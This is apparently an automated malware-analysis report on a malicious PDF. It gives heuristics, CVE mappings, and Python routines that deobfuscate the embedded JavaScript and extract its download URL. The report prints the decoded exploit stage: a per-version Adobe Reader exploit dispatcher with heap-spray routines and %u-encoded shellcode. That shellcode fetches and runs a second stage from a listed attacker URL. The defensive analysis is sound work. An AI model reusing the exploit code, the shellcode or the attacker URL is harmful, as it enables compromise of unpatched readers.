Verdict: MALICIOUS
Risk Score: 558
Malware Insights
MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
The PDF carries an obfuscated embedded JavaScript stream: a base-31 pair table assembled from string fragments and decoded with parseInt/String.fromCharCode before being passed to eval. The decoded stage branches on app.viewerVersion and the EScript plug-in version to pick the Adobe Reader exploit that fits the installed version (Collab.collectEmailInfo, util.printf, Collab.getIcon or media.newPlayer), heap-sprays a %u-encoded shellcode, and that shellcode carries a hardcoded URL from which a second stage is fetched. The PDF is therefore the initial dropper of a multi-stage attack; the real payload is hosted at the embedded URL, not inside the document.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (13)
- media.newPlayer (CVE-2009-4324) [critical; CVE match: exact; rule CVE_2009_4324]: PDF JavaScript calls media.newPlayer. CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(), actively exploited as a zero-day in December 2009. Identified after JavaScript deobfuscation.
- Collab.getIcon (CVE-2009-0927) [critical; CVE match: exact; rule CVE_2009_0927]: PDF JavaScript calls Collab.getIcon. CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument and allows arbitrary code execution. Identified after JavaScript deobfuscation.
- Collab.collectEmailInfo (CVE-2007-5659) [critical; CVE match: exact; rule CVE_2007_5659]: PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(), one of a series of Acrobat JS API exploits. Identified after JavaScript deobfuscation.
- util.printf (CVE-2008-2992) [critical; CVE match: exact; rule CVE_2008_2992]: PDF JavaScript calls util.printf(). CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument, widely exploited in the wild after disclosure. Identified after JavaScript deobfuscation.
- Pidief-style multi-CVE JavaScript dispatcher [critical; CVE match: likely; rule PDF_PIDIEF_MULTI_CVE_DISPATCH]: A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
- ClamAV: Pdf.Exploit.CoolExploitKit-6308636-0 [critical; rule CLAMAV_DETECTION]: ClamAV detected this file as malware: Pdf.Exploit.CoolExploitKit-6308636-0.
- JavaScript action [low; 3 related findings; rule PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster [critical; rule PDF_JS_EXPLOIT_CLUSTER]: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- PDF JavaScript shellcode contains an embedded download URL [high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL]: Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream [low; rule PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Base-N pair JavaScript stager [high; rule PDF_BASE_N_PAIR_JS_STAGER]: PDF JavaScript stores a long payload as character pairs decoded with parseInt(radix) and String.fromCharCode, then evals the result. The decoder only handles bounded pair tables and only fires when the recovered stage contains exploit-like JavaScript.
- Suspicious extracted artifact [info; rule EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info; rule EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached each URL. Only the first URL below is attacker infrastructure (it is the one carried in the shellcode); the remaining six are XMP/RDF namespace and ICC profile references that are normally present in PDF metadata.
  - http://elexvidster.me/discussing/widespread_obtaining_fingers.php?qvdosya=1o:1g:33:31:1f&mfwzvfw=1f:1l:1n:1h:30:1m:1j:1h:32:1i&pgy=1h&tlndn=fgzify&efa=tgxte (referenced by PDF JavaScript)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in PDF document text)
  - http://ns.adobe.com/xap/1.0/ (in PDF document text)
  - http://purl.org/dc/elements/1.1/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/mm/ (in PDF document text)
  - http://ns.adobe.com/pdf/1.3/ (in PDF document text)
  - http://www.iec.ch (in PDF document text)
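How the base-N pair stager finding is recovered in practice, as an added Python example (not the analyzer's code and not part of the sample): it first undoes the `'...'+zxc+'...'` concatenation trick the carved /JS object uses to keep the pair table out of any single string literal, then tries every radix from 2 to 36 and keeps the one whose output is printable JavaScript containing exploit-style tokens, which is the same gate the rule describes. The obfuscated input here is constructed, with a placeholder stage that only calls app.alert; the variable name `zxc` and the radix 31 are taken from this sample's own artifact, and the first four pairs of the page's table, `353d3m3a`, decode at radix 31 to the `bjsg` that opens the deobfuscated stage.

```python
import re

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"
# Tokens a recovered stage must contain before a radix is accepted; mirrors the
# "only fires when the recovered stage contains exploit-like JavaScript" rule.
JS_TOKENS = re.compile(r"function|unescape|eval|app\.|util\.|Collab\.")


def encode_pairs(text, radix):
    """Inverse of the stager's decoder; used here only to build the sample input."""
    out = []
    for ch in text:
        code = ord(ch)
        if code >= radix * radix:
            raise ValueError("character does not fit in two digits of radix %d" % radix)
        out.append(DIGITS[code // radix] + DIGITS[code % radix])
    return "".join(out)


# Constructed sample shaped like the carved /JS object on this page: the pair table
# is split with a one-letter variable (zxc) so no single literal holds the whole
# table, and the decoded stage is a harmless placeholder.
STAGE = "var p=unescape('%u9090%u9090');function go(){app.alert(p.length)}go();"
PAIRS = encode_pairs(STAGE, 31)
OBFUSCATED_JS = (
    "zxc='a'; a='" + PAIRS.replace("a", "'+zxc+'") + "';"
    "var s='';for(var i=0;i<a.length;i+=2){s+=String.fromCharCode(parseInt(a.substr(i,2),31))}eval(s);"
)


def rebuild_pair_table(js):
    """Undo the '...'+zxc+'...' split: substitute one-character string variables back
    into the concatenation and return the longest remaining digit literal."""
    consts = dict(re.findall(r"(\w+)='(\w)'", js))
    joined = re.sub(r"'\+(\w+)\+'", lambda m: consts.get(m.group(1), m.group(0)), js)
    literals = re.findall(r"'([0-9a-z]+)'", joined)
    return max(literals, key=len)


def decode_pairs(pairs, radix):
    """The stager's own decoder: two digits per character, parseInt(pair, radix)."""
    if len(pairs) % 2:
        raise ValueError("pair table has odd length")
    return "".join(chr(int(pairs[i:i + 2], radix)) for i in range(0, len(pairs), 2))


def recover_stage(pairs):
    """Try every radix 2..36 and keep the one that yields printable JavaScript with
    the most exploit-style tokens. Returns (radix, stage) or None if nothing fits."""
    best = None
    for radix in range(2, 37):
        try:
            text = decode_pairs(pairs, radix)
        except ValueError:          # some digit is out of range for this radix
            continue
        if not all(32 <= ord(c) < 127 or c in "\r\n\t" for c in text):
            continue
        hits = len(JS_TOKENS.findall(text))
        if hits and (best is None or hits > best[0]):
            best = (hits, radix, text)
    return None if best is None else (best[1], best[2])


if __name__ == "__main__":
    table = rebuild_pair_table(OBFUSCATED_JS)
    print(recover_stage(table))
```

Radix auto-detection is what makes this usable on unfamiliar samples: a wrong radix either fails to parse a digit (radices below the true one) or shifts every character into unreadable text (radices above it), so requiring both printability and at least one JavaScript token leaves a single candidate.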
Extracted artifacts (4)
Files carved from inside the sample during analysis.

| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| javascript_obj0019_000.js | 75a6a0963753a94970583a2793f9fd0e16f93451ca8e0b63c6b1de1cdf09e56f | pdf-javascript-stream | PDF /JS object 19 at offset 0x487 | 9378 bytes |
| base_n_pair_stage_000.js | c5aa0fac8ffa9b6f9b5872dacdad22bbc754082991f2793011d5a440c0a61714 | deobfuscated-js | base-31 pair decoded JavaScript at offset 0x495 | 4173 bytes |
| icc_00_off00002fe8.icc | 653b586c4707574ffcd648ba35494daed2c76ceafcf4c07d315ed961b1dc347f | pdf-icc-profile | PDF ICC profile at offset 0x2FE8 | 408 bytes |
| icc_01_off00003283.icc | 2b3aa1645779a9e634744faf9b01e9102b0c9b88fd6deced7934df86b949af7e | pdf-icc-profile | PDF ICC profile at offset 0x3283 | 3144 bytes |

Note that the ClamAV signature above fired on the PDF container; neither carved script matches on its own.

javascript_obj0019_000.js
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 2 eval/decoder/string-building token(s) and 5 long base64-like blob(s).
- Preview (first 1,000 lines of the extracted script; a span of the pair table is elided here):

```javascript
zxc='a'; a='353d3m3'+zxc+'[...]'+zxc+'3u3q3b3c3f38193l341f3f383h3'+zxc+'3n3b1b1j1t3k3s1'+zxc+'3u3l341c1u3l34413l341u3l341f3m3o353m3n3l3c3h3'+zxc+'191h1d3k3s1g1j1'+zxc+'1s3l383n3o3l3h113l3441393o3h363n3c3i3h11353r191'+zxc+'3u3p343l11373e3'+zxc+'1u3h383q11233l3l343s191'+zxc+'1s3p343l113p3q1u1h3r1h361h361h361h361s3p343l113437373l1u1h3r1l1h1h1h1h1h1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+zxc+'1'+zxc+'1s3p343l113m36323f383h1u3j343s3f3i34371f3f383h3'+zxc+'3n3b1b1j1s3p343l113k3s1u3437373l1e193m36323f383h1c1h3r1k1p1'+zxc+'1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131'+zxc+'1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1'+zxc+'1s3p343l11363i3o3h3n1j1u193p3q1e1h3r1l1h1h1h1h1h1'+zxc+'1g3437373l1s393i3l193p343l11363i3o3h3n1u1h1s363i3o3h3 ... (truncated)
```

base_n_pair_stage_000.js
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 11 eval/decoder/string-building token(s) and 1 long base64-like blob(s).
- Preview (first 1,000 lines of the extracted script, broken at top-level statements for readability; the content is otherwise unchanged):

```javascript
bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u652f%u656c%u7678%u6469%u7473%u7265%u6d2e%u2f65%u6964%u6373%u7375%u6973%u676e%u772f%u6469%u7365%u7270%u6165%u5f64%u626f%u6174%u6e69%u6e69%u5f67%u6966%u676e%u7265%u2e73%u6870%u3f70%u7671%u6f64%u7973%u3d61%u6f31%u313a%u3a67%u3333%u333a%u3a31%u6631%u6d26%u7766%u767a%u7766%u313d%u3a66%u6c31%u313a%u3a6e%u6831%u333a%u3a30%u6d31%u313a%u3a6a%u6831%u333a%u3a32%u6931%u7026%u7967%u313d%u2668%u6c74%u646e%u3d6e%u6766%u697a%u7966%u6526%u6166%u743d%u7867%u6574%u0000';
function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra}ra=ra.substring(0,qy/2);return ra}
function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload}var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow}this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow})}
function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock}fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock}mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock}var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num)}
function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload}var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw}tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw)}}
aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version}}
if((lv==9)||((sv==8)&&(lv<=8.12))){geticon()}else if(lv==7.1){printf()}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx()}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date())}var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version}}if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d}d=d.substr(0,0x8000-e.length);for(f=
... (truncated)
```

The dispatcher reads the major viewer version and the EScript plug-in version, then selects one sink per version range: Collab.getIcon for Reader 9 and early 8.x, util.printf for 7.1, and Collab.collectEmailInfo for 6.x and 7.0. Every branch sprays the same `bjsg` shellcode, whose trailing %u words spell out the http://elexvidster.me/... URL listed under Embedded URL.
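The three findings the decoded stage raises (multi-CVE dispatcher, exploit cluster, shellcode download URL) can be reproduced with a short static pass over the deobfuscated JavaScript. The following is an added Python example, not the analyzer's own code: the sample stage is constructed in the same shape as the preview above, with a placeholder URL and filler bytes standing in for working shellcode, and the sink-to-CVE map is the one given in the heuristics list. The URL extraction is the part that matters operationally: each `%uXXXX` escape is one UTF-16 code unit that Reader stores low byte first, so the string has to be byte-swapped pairwise before a plain ASCII search for `http://` will hit.

```python
import re

# Constructed sample in the shape of the deobfuscated stage shown above: a %u-encoded
# "shellcode" string (filler bytes plus an embedded placeholder URL, not working
# shellcode), two Acrobat JavaScript sinks, and a viewer-version dispatcher.
SAMPLE_STAGE = r"""
sc='%u9090%u9090%u7468%u7074%u2f3a%u652f%u6178%u706d%u656c%u692e%u766e%u6c61%u6469%u7a2f%u0000';
function bx(){var o=unescape("%u0c0c%u0c0c");while(o.length<44952){o+=o}Collab.collectEmailInfo({subj:"",msg:o})}
function pf(){util.printf("%45000f",1.2e200)}
var sv=parseInt(app.viewerVersion.toString().charAt(0));
if(sv==7){pf()}else{bx()}
"""

# Acrobat JS API sinks named in the heuristics on this page, keyed to their CVE.
SINKS = {
    "Collab.collectEmailInfo": "CVE-2007-5659",
    "util.printf": "CVE-2008-2992",
    "Collab.getIcon": "CVE-2009-0927",
    "media.newPlayer": "CVE-2009-4324",
}

U16_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")
U16_BLOB = re.compile(r"(?:%u[0-9a-fA-F]{4}){8,}")      # a run of 8 or more escapes
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")            # stops at the NUL terminator
STAGING = re.compile(r"\b(?:eval|unescape|fromCharCode)\b")


def unescape_u16le(s):
    """Turn a JS %uXXXX string into the bytes Reader lays out in memory:
    each escape is one UTF-16 code unit, stored low byte first."""
    out = bytearray()
    for m in U16_ESCAPE.finditer(s):
        v = int(m.group(1), 16)
        out += bytes((v & 0xFF, v >> 8))
    return bytes(out)


def find_sinks(js):
    """Sinks that are actually called (name followed by '('), sorted for stable output."""
    return sorted(n for n in SINKS if re.search(re.escape(n) + r"\s*\(", js))


def find_shellcode_urls(js):
    """Decode every long %u run and pull http(s) URLs out of the raw bytes."""
    urls = []
    for blob in U16_BLOB.findall(js):
        urls += [u.decode("ascii") for u in URL_RE.findall(unescape_u16le(blob))]
    return urls


def triage(js):
    sinks = find_sinks(js)
    return {
        "cves": [SINKS[s] for s in sinks],
        # PDF_PIDIEF_MULTI_CVE_DISPATCH: a version branch plus two or more sinks
        "multi_cve_dispatch": "app.viewerVersion" in js and len(sinks) >= 2,
        # PDF_JS_EXPLOIT_CLUSTER: at least one sink together with staging primitives
        "exploit_cluster": bool(sinks) and STAGING.search(js) is not None,
        # PDF_JS_SHELLCODE_DOWNLOAD_URL: a URL recovered from the byte-swapped blob
        "urls": find_shellcode_urls(js),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_STAGE).items():
        print(key, value)
```

Run on the page's own `bjsg` string, `unescape_u16le` yields the same bytes the heap spray places in memory, and the URL search returns the elexvidster.me address because the shellcode stores it NUL-terminated at its tail; the minimum run length of eight escapes keeps short NOP-sled literals such as `%u9090%u9090` from being decoded as shellcode.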